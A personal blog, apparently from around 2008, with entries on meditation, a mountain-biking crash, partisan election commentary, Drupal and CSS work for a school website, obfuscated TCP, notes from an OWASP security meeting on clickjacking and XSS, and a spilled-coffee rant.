Primate Brow Flash

I stopped by for the weekly talk/sit at Common Ground for the first time in about a year. It was well worth it. A good meditation session followed by a great lecture. There were about 80 people crammed into that little space.

Looking back at why I haven’t meditated in so long, I really had to blow up my old practice because of two influences. One was an embryonic book that warned people not to get so interested in meditating and staying calm and detatched that they missed the whole heart-pounding show. At almost the same time, the talk at the Common Ground warned that meditation should be intense, that your mind should be active and not working to shut itself down during meditation.

Not really consciously, I abandoned meditation practice because these two directives were almost too big for me to accommodate. The floaty hallucinatory calm was good for what it was, an escape, a calming influence, insight into some inner workings of an ordinary human male, but here were these twin calls for something a little more and they made me roll off the ball backwards.

So I finally went back last night, with these ideas steeping for a year while I lived my life whole-assedly. Someone in the audience asked the perfect question: ” I’m like, distracted by my wish not to be distracted or something.” Well, maybe the question wasn’t perfect. The English language really gets horrifically abused at that place when people try to explain their mental states before a large group of strangers. But the answer was perfect! To summarize the answer, there are two extremes in the type of meditation we are practicing. One extreme is intense adherence. Strangle the distraction as soon as you become aware of it and go back to the breath. Discipline. Concentration. The other extreme is to go and live in the distraction for a while until it goes away or you stop realizing it is a distraction and have to pull out by returning to the breath. It is really an art form to balance between the two extremes and know when to exercise discipline and when to look more closely at the distractions. Very helpful.

Their website, by the way, has hundreds of recorded dharma talks. Among those are three recorded “guided sits” that are mostly silence with the instructor giving direction every so often. I’m not sure how I like recorded guided sits. The disembodied voice after 15 solid minutes of quiet sometimes makes me jump out of my skin.

This is an introductory one with a question and answer period at the end:
http://commonground.dreamhosters.com/aud/IN_12-03-06_Intro_Wkshp_2__Guided_Practice_and_Q_and_A.mp3

This is from a retreat:
http://commonground.dreamhosters.com/aud/RD_04-12-08_Santikaro_Guided_Sit.mp3
This is from a guest speaker.
http://commonground.dreamhosters.com/aud/GD_07-12-07_Guided_Meditation_Ajahn_Chandako.mp3

I went mountain biking in Chequamegon National Forest this weekend with this guy, this guy, and this guy. I haven’t biked in some time because my back hurt and this trip was just the thing to get back into it. 7 of us stayed in a cabin/home outside of Cable, WI. There was direct trail access from the house. The area is lousy with great trails and amazing views.

The trails were just the right difficulty, somewhat hilly with lots of rocks and roots. I practiced choosing a route over obstacles and trusting the bike to bomb though while putting my attention on the next obstacle. It seemed like the most trouble came when I second-guessed the route, or line, I chose midway though an obstacle.

Right after lunch on Saturday, I was going downhill and spotted some rocks in the leaves. Standing up to handle the rocks, leaning forward a bit for some reason, I questioned my ability to pass the rocks, jammed on the front brakes and pitched over the handlebars. I landed “heavily” with my right arm under my ribs. I feel very fortunate that I didn’t impale myself on a thin stump or smash my face on a rock, but boy do my ribs hurt. Deep breaths hurt and certain arm movements hurt. Compared to back pain, this feels like a nap in the sun.

Much of our riding on Sunday followed the wide, hilly double track of the Birkebeiner cross-country ski race. (also the route of the Chequamegon fat tire festival). My single speed mountain bike mostly handled those hills. Some pictures are coming.

This is from Ken Adelman, a big-time Neocon who just announced that he is voting for Obama:

The Republican handling of the war made me value “experience” far less. If Cheney, Rumsfeld & Powell are the epitome of experience, I’ll take the alternative. They’ve given experience a bad name.

Further thought: McCain’s campaign soured me a lot. His hiring of the Bush attack squad, South Carolina 2000, made me view this honorable man as heading a dishonorable effort. And that’s still the case. It’s pretty disgusting, what he’s doing…

It heartens me to know that a person who has been in the halls of power and is partly responsible for the march to war, sees the administration the way I do and isn’t willing to let them smile and wave themselves out the door as if all is forgiven. He is saying exactly what will register with our countrymen: Not so much that the administration and the party is too conservative or too cynical or too vindictive, but that it is utterly incompetent.

He got a bit famous as a Republican who can think for himself when he said this:

“I just presumed that what I considered to be the most competent national security team since Truman was indeed going to be competent.” He also added, “They turned out to be among the most incompetent teams in the postwar era. Not only did each of them, individually, have enormous flaws, but together they were deadly, dysfunctional.” He wrote that the conduct of the war “just breaks your heart,” and it “didn’t have to be managed this bad; it’s awful.

We can see further evidence that the Republican party has lost all perspective by the fact that they haven’t silenced our wacky neighbor. Someone looked into her crazy kitty eyes and said, “That! that is the face of the party”.

So, who is driving the conservative movement into the ground? I have five theories:

• Democrats have infiltrated the top ranks of the Republican party and are influencing them to make bad decisions
• Republicans have a secret plan to let the Democrats win just in time for the Coming Global Shitstorm
• The Christianists, having successfully purged the party of anyone moderate or competent, want Armageddon.
• The saddest theory, and probably the correct one is that a once proud institution has been brought down by small minded bigots who confuse their egos with religious faith.
• Republicans have some kind of bombshell news that they are waiting to release at just the right moment. There should be a term for such a thing.

found on http://www.cynical-c.com/

We’re bailing out wall street, but who is going to bail you out?

Answer: Denny’s!

Denny’s $4.99 Breakfast Bail Out!

Our web team at the German School has rebooted with more energy to get the site revamped. I gave a presentation about Drupal tonight. I think they liked it. We have a designer, three people to work on navigation and content and myself. I’ve pledged to bend Drupal to our will.

The group liked the idea of a splash page. I plan on using the Drupal front page module that allows for a public facing front page of different style and layout than the main site. It also makes it easy to show a different page to a logged in user than to a non-logged in user.

They also identified the requirement of teachers maintaining their own home pages within the site so that they could post homework, class activities, art work and rules about what is allowed in lunches.

I got a tip from Steve to try out a theme based on the Blueprint CSS framework hatched out of code.google.com. It is more than a year old and still alive, so I can safely mention it here without risk of being an early adopter.
According to stonemind.com, “anyone with a basic knowledge of HTML and CSS can begin productively using Blueprint within a half hour and make better quality layouts as a result. That’s damn impressive.”
It works by declarations like this:


<div class="column span-4 prepend-1 append-1">
placeholder text
</div>

which seems to reward people that learned html table layouts in 1998 and then took the next ten years off. That is great if it helps everyone use CSS faster.

A note about the presentation. This is the first time I used Ubuntu to plug into an overhead and like everything else with Ubuntu, It just worked. I think it was a good showing for Ubuntu as well as Drupal.

Most of your web traffic can be listened to in some way. It is a hardship we all sort of ignore. The alternative, encrypting all web traffic with https, has been deemed too costly in terms of computing power and network latency. Obfuscated tcp is a way to encrypt a large percentage of web traffic without the network latency of establishing an https connection.
I’m taking the occasion of the release of a new version of obfuscated tcp to test it out.

Obstcp is “opportunistic” encryption. If both sides of the conversation (browser and server, for example) are able to encrypt traffic, then encryption happens. If they aren’t, they fall back to plain text communication. This isn’t as secure as ssl, though ssl may be run over obfuscated tcp.

Central to the idea is TCP’s three-way handshake.
1. browser sends a SYN to the server.
2. the server acknowleges the SYN with a SYN-ACK.
3. Finally, the browser sends an ACK back to the server. This step is called a SYN-ACK-ACK

This tells both parties that they have successfully started a conversation. With previous attempts at obfuscated tcp, the server with the second step says, not only am I here listening, but I’ll be able to handle it if you encrypt it, and since I have to bounce some communication back to you, I might as well send this hash along that tells you the port and the key by which to encrypt stuff. Then, the browser, sending back the SYN-ACK-ACK, says, now, we will begin talking. Expect encrypted communication.

Problems: The folks in charge of the TCP spec don’t want to allow this. Attempts to sneak this port/key payload into some existing part of the tcp package will fail because lots of servers simply drop the extra tcp information, as explained here.

In the third version, the author has given up trying tricks with the TCP packets themselve. Instead he is relying on DNS records to communicate the availability of encryption as well as the key/port hash for a certain domain. This means that the obstcp enabled client, when requesting a web connection, makes a DNS request, which it must do anyway, sees the key/port hash in the DNS CNAME (or the DNS TXT field or the web site header), and then connects.
Obstcp isn’t as secure as Https. It isn’t meant to be. It is really meant to protect the users against someone dipping a ladel into the stream of communication every so often and checking out the contents of what they pull out.

Others argue that https isn’t expensive enough to warrant a new protocol. In other words, it isn’t really a problem to run everything through https. Major web sites have already determined that the extra round trips would, in fact, be a big problem, so they don’t do everything in https. The core argument with obstcp is that weak encryption is far better than no encryption.

This weekend is like “Leaving Lost Vegas” except with dairy products.

The time has come for The All-Day Breakfast Party

Inspirational OWASP meeting last night. The speaker, Andrew van der Stock, threw out many terms and ideas that he expected the audience to be familiar with. I wrote down many of these for later lookup.

• extJS is a woefully insecure ajax framework. If someone is using extJS, their application is likely vulnerable to Cross Site Scripting. In the words of a lead developer of extJS, Jack Slocum:
  

  “It’s not the view layer’s job to do data security cleanup. In fact, doing so there could have a huge negative impact on performance of your application. That should be on an entirely different layer. I would recommend that when you do validation of data entered, you also do clean up to remove any insecure content.”

  Wow. Run from this. Don’t pause to collect your stuff. Just Run.

• Clickjacking. In Andrew’s view, Clickjacking is going to render the internet unusable once it gets better understood. As I understand it, an attacker can position an invisible button above an ordinary button on a web page you are viewing. So,you think you click on a “Submit” button in some forum, but you actually click a hovering invisible button that ends up linking to your bank account or email account. Kind of like when Sylvester’s tail gets painted like a tweety bird and he bites it. At this point, noscript addon for Firefox is the only defense against this. but:
  

  For the moment, the best defense against clickjacking attacks is to use Firefox with the NoScript add-on installed. Users running that combination will be safe, said Hansen, against “a very good chunk of the issues, 99.99 percent at this point.”

  In the next breath, however, he called the Firefox-NoScript solution a stop-gap fix suitable only for technical users. “If my Mom was using NoScript, I’d be taking all kinds of technical support calls,” he said. “It’s not the right solution.”

  Interestingly, the noscript site itself employs clickjacking for more positive ends. The spot where you click, “Install now” actually has an invisible overlay of the real firefox add-ons site that your browser already trusts. This allows a more seamless install of the software because your browser thinks it is getting it from mozilla. Based on this example, I can think of 3 ways to implement clickjacking

  1. You visit a nefarious site that has coded an invisible button over one of the visible buttons on the page
  2. You visit a benign site that has been compromised into creating one of these invisible buttons
  3. You visit a site vulnerable to XSS that is then used to create a clickjacking situation.

  In each of these, clickjacking seems to be a combination of two or more other attacks (XSS,CSRF)

• ESAPI. This is one I should really have known about. It is a set of interfaces by OWASP that provide foils for each of the major web application attack vectors. The initial release is for Java, but .NET and PHP versions are in the works.
• HoneyComb Project: This is an attempt to create a comprehensive storehouse of information about application security. It exists in wiki form as well as a giant word doc.
• Paypal Security Key. Andrew was impressed by the security devices that Paypal gives to their users for next to nothing. Leading the way in two-factor identification over the web, Paypal has “The Security Key, “a device that generates a temporary 6-digit security code every 30 seconds. Use it every time you log in for added security” If Paypal can do this so cheaply, then everyone should.
• Log4J no security logging level. I use Log4J all the time, but never questioned why it didn’t have a security logging feature. I found “How to add a security logging level to Log4J“, but I’m not sure if it meets all the needs that Andrew had in mind. I’m going to test this out.
• Volunteers: OWASP needs volunteers. It needs PHP experts to work on the PHP ESAPI. It needs technical editors to work on the OWASP Guide for developers. Testers, writers, and wikipedians. It needs volunteers to organize the HoneyComb project. It is a good way to learn more, get your name out there, and contribute to a valuable organization.

In the most recent vmware release, we have the ability to break individual windows out of the VM and integrate them into the host’s desktop. I recently erased my windows Vista and replaced it with Ubuntu. I’ve been happy as hell with that switch, but still need to test web pages on IE. So, I have a windows VMware image and because of Unity, I can just tell it to give me an IE window on my Linux desktop. I understand that VMWare Fusion on Macs has had this feature for a while now.

I drove off with a heavy metal travel mug full of fresh coffee. When I turned a corner, the top-heavy, shitball travel mug tipped over onto the floor and began gurgling coffee out. By the time I pulled over and picked it up, it was nearly empty. Naturally, I screamed “BULLSHIT!” and smashed the cup holder as hard as I could with the mug. This spread the remaining coffee evenly over everything in the car and atomized the cup holder. Pieces of it ricocheted around the car for 15 seconds.